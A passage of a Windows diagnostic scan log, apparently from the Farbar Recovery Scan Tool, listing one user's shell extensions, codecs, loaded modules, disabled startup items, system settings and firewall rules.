CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
